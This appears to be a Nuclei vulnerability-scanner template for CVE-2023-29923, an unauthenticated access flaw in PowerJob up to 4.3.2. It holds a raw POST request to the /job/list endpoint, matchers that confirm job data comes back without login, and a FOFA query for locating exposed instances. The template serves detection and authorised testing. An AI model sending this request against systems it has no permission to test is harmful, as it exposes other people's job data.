nuclei-templates/http/cves/2023/CVE-2023-29923.yaml

41 lines
938 B
YAML
Raw Normal View History

2023-05-14 03:14:15 +00:00
id: CVE-2023-29923
info:
name: PowerJob <=4.3.2 - Unauthenticated Access
author: For3stCo1d
severity: medium
description: |
PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.
reference:
- https://github.com/PowerJob/PowerJob/issues/587
- https://nvd.nist.gov/vuln/detail/CVE-2023-29923
metadata:
2023-05-15 18:42:48 +00:00
verified: "true"
2023-05-14 03:14:15 +00:00
fofa-query: app="PowerJob"
tags: cve,cve2023,powerjob,unauth
http:
- raw:
- |
POST /job/list HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
{"appId":1,"index":0,"pageSize":10}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"success":true,"data":{"index":0,"pageSize":10,'
- type: word
part: header
words:
- "Content-Type: application/json"
- type: status
status:
- 200